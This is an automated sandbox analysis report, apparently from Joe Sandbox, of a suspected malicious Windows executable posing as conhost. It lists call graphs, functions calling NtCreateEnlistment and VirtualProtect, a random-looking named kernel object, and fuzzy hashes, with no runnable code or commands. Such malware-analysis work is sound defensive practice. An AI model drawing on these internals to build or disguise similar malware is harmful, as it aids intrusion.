2747 140001394 2 API calls 2746->2747 2748 14000154e 2747->2748 2749 140001394 2 API calls 2748->2749 2750 14000155d 2749->2750 2751 140001394 2 API calls 2750->2751 2752 14000156c 2751->2752 2753 140001394 2 API calls 2752->2753 2754 14000157b 2753->2754 2755 140001394 2 API calls 2754->2755 2756 14000158a 2755->2756 2757 140001394 2 API calls 2756->2757 2758 140001599 2757->2758 2759 140001394 2 API calls 2758->2759 2760 1400015a8 2759->2760 2761 140001394 2 API calls 2760->2761 2762 1400015b7 2761->2762 2763 140001394 2 API calls 2762->2763 2764 1400015c6 2763->2764 2765 140001394 2 API calls 2764->2765 2766 1400015d5 2765->2766 2767 140001394 2 API calls 2766->2767 2768 1400015e4 2767->2768 2769 140001394 2 API calls 2768->2769 2770 1400015f3 2769->2770 2770->2238 2772 140001394 2 API calls 2771->2772 2773 140001440 2772->2773 2774 140001394 2 API calls 2773->2774 2775 14000144f 2774->2775 2776 140001394 2 API calls 2775->2776 2777 14000145e 2776->2777 2778 140001394 2 API calls 2777->2778 2779 14000146d 2778->2779 2780 140001394 2 API calls 2779->2780 2781 14000147c 2780->2781 2782 140001394 2 API calls 2781->2782 2783 14000148b 2782->2783 2784 140001394 2 API calls 2783->2784 2785 14000149a 2784->2785 2786 140001394 2 API calls 2785->2786 2787 1400014a9 2786->2787 2788 140001394 2 API calls 2787->2788 2789 1400014b8 2788->2789 2790 140001394 2 API calls 2789->2790 2791 1400014c7 2790->2791 2792 140001394 2 API calls 2791->2792 2793 1400014d6 2792->2793 2794 1400014e5 2793->2794 2795 140001394 2 API calls 2793->2795 2796 140001394 2 API calls 2794->2796 2795->2794 2797 1400014ef 2796->2797 2798 1400014f4 2797->2798 2799 140001394 2 API calls 2797->2799 2800 140001394 2 API calls 2798->2800 2799->2798 2801 1400014fe 2800->2801 2802 140001503 2801->2802 2803 140001394 2 API calls 2801->2803 2804 140001394 2 API calls 2802->2804 2803->2802 2805 14000150d 2804->2805 2806 140001394 2 API calls 2805->2806 2807 140001512 2806->2807 2808 140001394 2 API calls 2807->2808 2809 140001521 2808->2809 2810 140001394 2 API calls 2809->2810 2811 140001530 2810->2811 2812 140001394 2 API calls 2811->2812 2813 14000153f 2812->2813 2814 140001394 2 API calls 2813->2814 2815 14000154e 2814->2815 2816 140001394 2 API calls 2815->2816 2817 14000155d 2816->2817 2818 140001394 2 API calls 2817->2818 2819 14000156c 2818->2819 2820 140001394 2 API calls 2819->2820 2821 14000157b 2820->2821 2822 140001394 2 API calls 2821->2822 2823 14000158a 2822->2823 2824 140001394 2 API calls 2823->2824 2825 140001599 2824->2825 2826 140001394 2 API calls 2825->2826 2827 1400015a8 2826->2827 2828 140001394 2 API calls 2827->2828 2829 1400015b7 2828->2829 2830 140001394 2 API calls 2829->2830 2831 1400015c6 2830->2831 2832 140001394 2 API calls 2831->2832 2833 1400015d5 2832->2833 2834 140001394 2 API calls 2833->2834 2835 1400015e4 2834->2835 2836 140001394 2 API calls 2835->2836 2837 1400015f3 2836->2837 2837->2238

                                                      Callgraph

                                                      • Executed
                                                      • Not Executed
                                                      • Opacity -> Relevance
                                                      • Disassembly available
                                                      callgraph 0 Function_0000000140001AE4 31 Function_0000000140001D40 0->31 75 Function_0000000140001BA0 0->75 1 Function_00000001400014E5 71 Function_0000000140001394 1->71 2 Function_00000001400010F0 3 Function_00000001400030F1 4 Function_00000001400057F1 5 Function_00000001400058F1 6 Function_00000001400014F4 6->71 7 Function_0000000140001800 67 Function_0000000140002290 7->67 8 Function_0000000140001E00 9 Function_0000000140005D00 34 Function_0000000140005A40 9->34 10 Function_0000000140002F00 58 Function_0000000140001370 10->58 11 Function_0000000140001000 11->8 40 Function_0000000140001750 11->40 80 Function_0000000140001FB0 11->80 87 Function_0000000140001FC0 11->87 12 Function_0000000140002500 13 Function_0000000140001503 13->71 14 Function_0000000140001404 14->71 15 Function_0000000140002104 16 Function_0000000140001E10 17 Function_0000000140003110 18 Function_0000000140005711 19 Function_0000000140005811 20 Function_0000000140001512 20->71 21 Function_0000000140002420 22 Function_0000000140002320 23 Function_0000000140005A20 24 Function_0000000140001521 24->71 25 Function_0000000140001422 25->71 26 Function_0000000140001530 26->71 27 Function_0000000140003130 28 Function_0000000140001431 28->71 29 Function_0000000140005831 30 Function_000000014000153F 30->71 31->67 32 Function_0000000140001440 32->71 33 Function_0000000140001140 48 Function_0000000140001160 33->48 35 Function_0000000140005741 36 Function_0000000140001F47 59 Function_0000000140001870 36->59 37 Function_0000000140002050 38 Function_0000000140005A50 38->34 39 Function_0000000140003150 39->10 39->13 39->24 39->25 39->26 39->28 39->30 39->32 39->34 45 Function_000000014000145E 39->45 47 Function_0000000140002660 39->47 54 Function_000000014000156C 39->54 55 Function_000000014000146D 39->55 39->58 61 Function_000000014000157B 39->61 77 Function_00000001400015A8 39->77 78 Function_00000001400014A9 39->78 86 Function_00000001400016C0 39->86 97 Function_00000001400014D6 39->97 98 Function_00000001400026E0 39->98 41 Function_0000000140001650 42 Function_0000000140005851 43 Function_0000000140003051 44 Function_000000014000155D 44->71 45->71 46 Function_0000000140002460 48->39 48->48 48->59 62 Function_0000000140001880 48->62 66 Function_0000000140001F90 48->66 48->86 49 Function_0000000140001760 99 Function_00000001400020E0 49->99 50 Function_0000000140005860 51 Function_0000000140005761 52 Function_0000000140005961 53 Function_0000000140001E65 53->59 54->71 55->71 56 Function_000000014000216F 57 Function_0000000140001A70 57->31 57->75 60 Function_0000000140003070 61->71 62->21 62->31 62->47 62->75 63 Function_0000000140005781 64 Function_0000000140005881 65 Function_0000000140005981 68 Function_0000000140002590 69 Function_0000000140003090 70 Function_0000000140002691 71->9 71->38 72 Function_0000000140002194 72->59 73 Function_000000014000219E 74 Function_0000000140001FA0 75->31 79 Function_00000001400023B0 75->79 92 Function_00000001400024D0 75->92 76 Function_00000001400057A1 77->71 78->71 81 Function_00000001400022B0 82 Function_00000001400026B0 83 Function_00000001400030B1 84 Function_00000001400058B1 85 Function_0000000140001AB3 85->31 85->75 88 Function_00000001400059C1 89 Function_0000000140001AC3 89->31 89->75 90 Function_00000001400014C7 90->71 91 Function_0000000140001FD0 93 Function_00000001400017D0 94 Function_00000001400026D0 95 Function_00000001400057D1 96 Function_0000000140001AD4 96->31 96->75 97->71 98->1 98->6 98->13 98->20 98->34 98->44 98->45 98->47 98->58 98->78 98->90 100 Function_00000001400017E0 100->99 101 Function_00000001400022E0

                                                      Executed Functions

                                                      Function 0000000140001394 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • NtCreateEnlistment.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2668786866.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000025.00000002.2668752408.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000025.00000002.2668813498.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000025.00000002.2668838319.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000025.00000002.2668862414.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_140000000_conhost.jbxd
                                                      Similarity
                                                      • API ID: CreateEnlistment
                                                      • String ID:
                                                      • API String ID: 1207551591-0
                                                      • Opcode ID: 2826bf933b6c05314846991301916adf57e49d07940debb5eab16ace37e77d14
                                                      • Instruction ID: 35ac0efe93fe85c119e55826d4317f241f31154ff2ae5808118bfd6961f8b30b
                                                      • Opcode Fuzzy Hash: 2826bf933b6c05314846991301916adf57e49d07940debb5eab16ace37e77d14
                                                      • Instruction Fuzzy Hash: B5F09DB2608B408AEA12DB52F89579A77A0F38D7C0F00991ABBC843735DB38C190CB40

                                                      Non-executed Functions

                                                      Function 00000001400026E0 Relevance: 19.6, APIs: 7, Strings: 4, Instructions: 376COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 311 1400026e0-14000273b call 140002660 315 140002741-14000274b 311->315 316 14000280e-14000285e call 14000155d 311->316 318 140002774-14000277a 315->318 321 140002953-14000297b call 1400014c7 316->321 322 140002864-140002873 316->322 318->316 320 140002780-140002787 318->320 323 140002789-140002792 320->323 324 140002750-140002752 320->324 338 140002986-1400029c8 call 140001503 call 140005a40 321->338 339 14000297d 321->339 325 140002eb7-140002ef4 call 140001370 322->325 326 140002879-140002888 322->326 329 140002794-1400027ab 323->329 330 1400027f8-1400027fb 323->330 327 14000275a-14000276e 324->327 331 1400028e4-14000294e wcsncmp call 1400014e5 326->331 332 14000288a-1400028dd 326->332 327->316 327->318 335 1400027f5 329->335 336 1400027ad-1400027c2 329->336 330->327 331->321 332->331 335->330 340 1400027d0-1400027d7 336->340 349 140002e49-140002e84 call 140001370 338->349 350 1400029ce-1400029d5 338->350 339->338 342 1400027d9-1400027f3 340->342 343 140002800-140002809 340->343 342->335 342->340 343->327 353 1400029d7-140002a0c 349->353 357 140002e8a 349->357 352 140002a13-140002a43 wcscpy wcscat wcslen 350->352 350->353 355 140002a45-140002a76 wcslen 352->355 356 140002a78-140002aa5 352->356 353->352 358 140002aa8-140002abf wcslen 355->358 356->358 357->352 359 140002ac5-140002ad8 358->359 360 140002e8f-140002eab call 140001370 358->360 362 140002af5-140002dfb wcslen call 1400014a9 * 2 call 1400014f4 call 1400014c7 * 2 call 14000145e * 3 359->362 363 140002ada-140002aee 359->363 360->325 381 140002dfd-140002e1b call 140001512 362->381 382 140002e20-140002e48 call 14000145e 362->382 363->362 381->382
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2668786866.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000025.00000002.2668752408.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000025.00000002.2668813498.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000025.00000002.2668838319.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000025.00000002.2668862414.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_140000000_conhost.jbxd
                                                      Similarity
                                                      • API ID: wcslen$wcscatwcscpywcsncmp
                                                      • String ID: 0$X$\BaseNamedObjects\hztoxpurdxqvywpkpwgleilk$`
                                                      • API String ID: 597572034-777484344
                                                      • Opcode ID: 616dd30e29db12fdc02cbaa5b64d11a1fa0e2ae95b2531fbde53f322a39f1c5b
                                                      • Instruction ID: 831cedccfe1c450249e5303b8802ab8c24b5a681da26d5a4265c78d3475a5d4e
                                                      • Opcode Fuzzy Hash: 616dd30e29db12fdc02cbaa5b64d11a1fa0e2ae95b2531fbde53f322a39f1c5b
                                                      • Instruction Fuzzy Hash: 8D1258B2608BC085E762CB16F8443EAB7A4F789794F414215EBA957BF5EF78C189C700
                                                      Function 0000000140001160 Relevance: 13.6, APIs: 9, Instructions: 130sleepstringCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2668786866.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000025.00000002.2668752408.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000025.00000002.2668813498.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000025.00000002.2668838319.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000025.00000002.2668862414.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_140000000_conhost.jbxd
                                                      Similarity
                                                      • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                      • String ID:
                                                      • API String ID: 2643109117-0
                                                      • Opcode ID: 00ac1c66197ebc50227b88a6223cca9505f05baf94f6ca9dba6275d7e8e9b764
                                                      • Instruction ID: 853b5cb4b810d97d978816ea4420ec313e3627c3af1e5f4ec8bc55cd55e56463
                                                      • Opcode Fuzzy Hash: 00ac1c66197ebc50227b88a6223cca9505f05baf94f6ca9dba6275d7e8e9b764
                                                      • Instruction Fuzzy Hash: 2D5114B1611A4085FB16EF27F9947EA27A5BB8D7D0F849121FB4D873B6DE38C4958300
                                                      Function 0000000140001BA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 427 140001ba0-140001bc0 428 140001bc2-140001bd7 427->428 429 140001c09 427->429 431 140001be9-140001bf1 428->431 430 140001c0c-140001c17 call 1400023b0 429->430 437 140001cf4-140001cfe call 140001d40 430->437 438 140001c1d-140001c6c call 1400024d0 VirtualQuery 430->438 433 140001bf3-140001c02 431->433 434 140001be0-140001be7 431->434 433->434 436 140001c04 433->436 434->430 434->431 439 140001cd7-140001cf3 memcpy 436->439 442 140001d03-140001d1e call 140001d40 437->442 438->442 445 140001c72-140001c79 438->445 446 140001d23-140001d38 GetLastError call 140001d40 442->446 447 140001c7b-140001c7e 445->447 448 140001c8e-140001c97 445->448 450 140001cd1 447->450 451 140001c80-140001c83 447->451 452 140001ca4-140001ccf VirtualProtect 448->452 453 140001c99-140001c9c 448->453 450->439 451->450 455 140001c85-140001c8a 451->455 452->446 452->450 453->450 456 140001c9e 453->456 455->450 457 140001c8c 455->457 456->452 457->456
                                                      APIs
                                                      • VirtualQuery.KERNEL32(?,?,?,?,0000000140007C14,0000000140007C14,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
                                                      • VirtualProtect.KERNEL32(?,?,?,?,0000000140007C14,0000000140007C14,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
                                                      • memcpy.MSVCRT ref: 0000000140001CE0
                                                      • GetLastError.KERNEL32(?,?,?,?,0000000140007C14,0000000140007C14,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2668786866.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000025.00000002.2668752408.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000025.00000002.2668813498.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000025.00000002.2668838319.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000025.00000002.2668862414.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_140000000_conhost.jbxd
                                                      Similarity
                                                      • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                      • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                      • API String ID: 2595394609-2123141913
                                                      • Opcode ID: d18d1f09fdfba77917c7540234edc89a1ae34ad00b66a5eb73fbe7bf19acb5c3
                                                      • Instruction ID: ec64a22a3afb06751a644bfa6223830d5787557f53419172101f724c34e2370a
                                                      • Opcode Fuzzy Hash: d18d1f09fdfba77917c7540234edc89a1ae34ad00b66a5eb73fbe7bf19acb5c3
                                                      • Instruction Fuzzy Hash: FB4143F1601A4586FA26DF47F884BE927A0E78DBC4F554126EF0E877B1DA38C586C700
                                                      Function 0000000140002104 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 458 140002104-14000210b 459 140002111-140002128 EnterCriticalSection 458->459 460 140002218-140002221 458->460 461 14000220b-140002212 LeaveCriticalSection 459->461 462 14000212e-14000213c 459->462 463 140002272-140002280 460->463 464 140002223-14000222d 460->464 461->460 465 14000214d-140002159 TlsGetValue GetLastError 462->465 466 140002241-140002263 DeleteCriticalSection 464->466 467 14000222f 464->467 468 14000215b-14000215e 465->468 469 140002140-140002147 465->469 466->463 470 140002230-14000223f 467->470 468->469 471 140002160-14000216d 468->471 469->461 469->465 470->466 471->469
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2668786866.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000025.00000002.2668752408.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000025.00000002.2668813498.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000025.00000002.2668838319.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000025.00000002.2668862414.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_140000000_conhost.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$DeleteEnterErrorLastLeaveValue
                                                      • String ID:
                                                      • API String ID: 926137887-0
                                                      • Opcode ID: 27e192ecc5d799857d1c8385dbaaf5a6f836238ff6c117ed4402dc7d43894369
                                                      • Instruction ID: 697f876828b5171767c564f6bb86c971c65e3a042cbe6cf173943f1c4610416a
                                                      • Opcode Fuzzy Hash: 27e192ecc5d799857d1c8385dbaaf5a6f836238ff6c117ed4402dc7d43894369
                                                      • Instruction Fuzzy Hash: D521E0B1715A0292FA5BEB53F9583E923A0B76CBD0F444021FB1E576B4DB7A8986C300
                                                      Function 0000000140001E10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 474 140001e10-140001e2d 475 140001e3e-140001e48 474->475 476 140001e2f-140001e38 474->476 478 140001ea3-140001ea8 475->478 479 140001e4a-140001e53 475->479 476->475 477 140001f60-140001f69 476->477 478->477 482 140001eae-140001eb3 478->482 480 140001e55-140001e60 479->480 481 140001ecc-140001ed1 479->481 480->478 485 140001f23-140001f2d 481->485 486 140001ed3-140001ee2 signal 481->486 483 140001eb5-140001eba 482->483 484 140001efb-140001f0a call 140005ff0 482->484 483->477 490 140001ec0 483->490 484->485 495 140001f0c-140001f10 484->495 488 140001f43-140001f45 485->488 489 140001f2f-140001f3f 485->489 486->485 491 140001ee4-140001ee8 486->491 488->477 489->488 490->485 492 140001eea-140001ef9 signal 491->492 493 140001f4e-140001f53 491->493 492->477 496 140001f5a 493->496 497 140001f12-140001f21 signal 495->497 498 140001f55 495->498 496->477 497->477 498->496
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2668786866.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000025.00000002.2668752408.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000025.00000002.2668813498.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000025.00000002.2668838319.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000025.00000002.2668862414.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_140000000_conhost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: CCG
                                                      • API String ID: 0-1584390748
                                                      • Opcode ID: 112abc6df4a3a955ea7a6242a2a3ec18b1e193b9e50968186ba58eaa7180ca05
                                                      • Instruction ID: 838ee2c544bf2803730cc930bbb0f4a86f91135578be0a2b6e08d954fec56f6a
                                                      • Opcode Fuzzy Hash: 112abc6df4a3a955ea7a6242a2a3ec18b1e193b9e50968186ba58eaa7180ca05
                                                      • Instruction Fuzzy Hash: A72159B1A0110642FA77DA1BB5943FA1182ABCD7E4F258535BF1A473F9DE3C88828241
                                                      Function 0000000140001880 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 499 140001880-14000189c 500 1400018a2-1400018f9 call 140002420 call 140002660 499->500 501 140001a0f-140001a1f 499->501 500->501 506 1400018ff-140001910 500->506 507 140001912-14000191c 506->507 508 14000193e-140001941 506->508 509 14000194d-140001954 507->509 510 14000191e-140001929 507->510 508->509 511 140001943-140001947 508->511 514 140001956-140001961 509->514 515 14000199e-1400019a6 509->515 510->509 512 14000192b-14000193a 510->512 511->509 513 140001a20-140001a26 511->513 512->508 516 140001b87-140001b98 call 140001d40 513->516 517 140001a2c-140001a37 513->517 518 140001970-14000199c call 140001ba0 514->518 515->501 519 1400019a8-1400019c1 515->519 517->515 520 140001a3d-140001a5f 517->520 518->515 523 1400019df-1400019e7 519->523 526 140001a7d-140001a97 520->526 524 1400019e9-140001a0d VirtualProtect 523->524 525 1400019d0-1400019dd 523->525 524->525 525->501 525->523 529 140001b74-140001b82 call 140001d40 526->529 530 140001a9d-140001afa 526->530 529->516 536 140001b22-140001b26 530->536 537 140001afc-140001b0e 530->537 540 140001b2c-140001b30 536->540 541 140001a70-140001a77 536->541 538 140001b5c-140001b6c 537->538 539 140001b10-140001b20 537->539 538->529 543 140001b6f call 140001d40 538->543 539->536 539->538 540->541 542 140001b36-140001b57 call 140001ba0 540->542 541->515 541->526 542->538 543->529
                                                      APIs
                                                      • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2668786866.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000025.00000002.2668752408.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000025.00000002.2668813498.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000025.00000002.2668838319.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000025.00000002.2668862414.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_140000000_conhost.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                      • API String ID: 544645111-395989641
                                                      • Opcode ID: a6faf70e8b190511a78e30de1eab31b3fdd89b936d163022cdfacdbb5805c305
                                                      • Instruction ID: bed1886f8e7b3562c786f91e2c2504e2a336d35a61311b426e06807153cec951
                                                      • Opcode Fuzzy Hash: a6faf70e8b190511a78e30de1eab31b3fdd89b936d163022cdfacdbb5805c305
                                                      • Instruction Fuzzy Hash: 415114B6B11544DAEB12CF67F840BE827A1A759BE8F548212FB1D077B4DB38C986C700
                                                      Function 0000000140001800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 547 140001800-140001810 548 140001812-140001822 547->548 549 140001824 547->549 550 14000182b-140001867 call 140002290 fprintf 548->550 549->550
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2668786866.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000025.00000002.2668752408.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000025.00000002.2668813498.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000025.00000002.2668838319.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000025.00000002.2668862414.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_140000000_conhost.jbxd
                                                      Similarity
                                                      • API ID: fprintf
                                                      • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                      • API String ID: 383729395-3474627141
                                                      • Opcode ID: 577444ae89d5f5a6c95c3a2f675773f7031f896e683781332b98d4dce8e5709a
                                                      • Instruction ID: a02188ec0087b42d3f25a0ad686d1475033a3de64a4a15f6bec79cad075d9a0b
                                                      • Opcode Fuzzy Hash: 577444ae89d5f5a6c95c3a2f675773f7031f896e683781332b98d4dce8e5709a
                                                      • Instruction Fuzzy Hash: 1DF09671A14A4482E612EF6AB9417ED6360E75D7C1F50D211FF4D576A5DF3CD182C310
                                                      Function 000000014000219E Relevance: 5.0, APIs: 4, Instructions: 34COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 553 14000219e-1400021a5 554 140002272-140002280 553->554 555 1400021ab-1400021c2 EnterCriticalSection 553->555 556 140002265-14000226c LeaveCriticalSection 555->556 557 1400021c8-1400021d6 555->557 556->554 558 1400021e9-1400021f5 TlsGetValue GetLastError 557->558 559 1400021f7-1400021fa 558->559 560 1400021e0-1400021e7 558->560 559->560 561 1400021fc-140002209 559->561 560->556 560->558 561->560
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.2668786866.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000025.00000002.2668752408.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000025.00000002.2668813498.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000025.00000002.2668838319.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000025.00000002.2668862414.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_140000000_conhost.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                      • String ID:
                                                      • API String ID: 682475483-0
                                                      • Opcode ID: ef714723185b3a8d2aed80037f9450dbdc245cd35eb766ee46406a0163f8cc51
                                                      • Instruction ID: 8e08899b71d5d6c295770fc95a4fa8b22c720a8a39741bac27afb53efd3d8dea
                                                      • Opcode Fuzzy Hash: ef714723185b3a8d2aed80037f9450dbdc245cd35eb766ee46406a0163f8cc51
                                                      • Instruction Fuzzy Hash: C201B2B5705A0192FA5BDB53FE083E86360B76CBD1F454061EF0957AB4DF79C996C200